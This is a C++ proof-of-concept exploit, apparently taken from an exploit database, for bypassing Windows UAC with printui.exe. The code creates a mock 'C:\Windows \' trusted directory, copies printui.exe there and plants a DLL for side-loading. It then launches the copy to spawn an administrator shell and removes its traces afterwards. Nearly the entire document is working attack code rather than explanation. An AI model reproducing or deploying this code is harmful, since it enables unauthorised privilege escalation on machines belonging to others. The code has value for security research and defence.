Microsoft Windows x64 – Privilege Escalation (UAC Protection Bypass printui.exe) Exploit

## https://sploitus.com/exploit?id=1337DAY-ID-33357
#include <windows.h>
#include <stdio.h>
#include <string.h>
#include "resource.h"
#include <winres.h>
#include <string>
#include <tchar.h>
#define err -1
#define dis 0
#define def 1
#define max 2
#define BUFFER 8192
int CheckUac() {
	int ConsentAdmin;
	int EnableLua;
	DWORD BufferSize = BUFFER;
	RegGetValue(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", L"ConsentPromptBehaviorAdmin", RRF_RT_REG_DWORD, NULL, (PVOID)& ConsentAdmin, &BufferSize);
	RegGetValue(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", L"EnableLUA", RRF_RT_REG_DWORD, NULL, (PVOID)& EnableLua, &BufferSize);
	if (ConsentAdmin == 5 && EnableLua == 1) { return def; }
	else if (ConsentAdmin == 2 && EnableLua == 1) { return max; }
	else if (ConsentAdmin == 0 || EnableLua == 0) { return dis; }
	else { return err; }
}
INT wmain() {
	// Author : Abdelhamid Naceri
	printf("[!] Author : Abdelhamid Naceri \n");
	printf("[!] Checking UAC Level ...\n");
	//Perform A Check Before begining because the uac would be triggered if it on the highest level
	if (CheckUac() == def) {
		printf("[+] UAC Is On Default Level ...\n");
	}
	else if (CheckUac() == max) {
		printf("[-] UAC Is On Always Notify Level Cant Continue ...\n");
		printf("[-] Exiting ...");
		return 0;
	}
	else if (CheckUac() == dis) {
		printf("[+] UAC Is Disabled This Exploit Is Not Required , Elevate Yourself ...\n");
		printf("[+] Exiting ...");
		//exit if the uac in the highest level
		return 0;
	}
	else{
		printf("[+] Something Went Wrong :(\n");
		printf("[+] Exiting ...");
		//unknown value retrieved from the registry
		return 0;
	}
	printf("[+] Creating Fake Trusted Directory If Do No Exist ...\n");
	CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0);
	CreateDirectoryW(L"\\\\?\\C:\\Windows \\SysWOW64", 0);
	//this "Windows " bypass the uac ANSI character set check
	printf("[+] Copying Executable To Fake Trusted Directory ...\n");
	CopyFileW(L"C:\\Windows\\SysWOW64\\printui.exe", L"\\\\?\\C:\\Windows \\SysWOW64\\printui.exe", false);
	printf("[+] Extracting Resources To Fake Trusted Directory ...\n");
	HMODULE hm = GetModuleHandle(NULL);
	HRSRC res = FindResource(hm, MAKEINTRESOURCE(IDR_DLL1), L"dll");
	DWORD DllSize = SizeofResource(hm, res);
	void* dllBuff = LoadResource(hm, res);
	HANDLE hDll = CreateFile(L"\\\\?\\C:\\Windows \\SysWOW64\\printui.dll", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL);
	//You Can Find The Full Project https://github.com/klinix5/UAC_Bypass
     DWORD sizeout;
	WriteFile(hDll, dllBuff, DllSize, &sizeout, NULL);
	CloseHandle(hDll);
	printf("[+] Spawning Administrator Shell ...\n");
	ShellExecute(NULL, _T("open"), _T("C:\\Windows \\SysWOW64\\printui.exe"), NULL, NULL, SW_RESTORE);
	printf("[+] PwNeD :) \n");
	printf("[+] Cleaning Up Resources ...\n");
	Sleep(3000);
	DeleteFile(L"C:\\Windows \\SysWOW64\\printui.dll");
	DeleteFile(L"C:\\Windows \\SysWOW64\\printui.exe");
	_wrmdir(L"\\\\?\\C:\\Windows \\SysWOW64");
	_wrmdir(L"\\\\?\\C:\\Windows ");
	printf("[-_-] Exiting ...");
	return 0;
}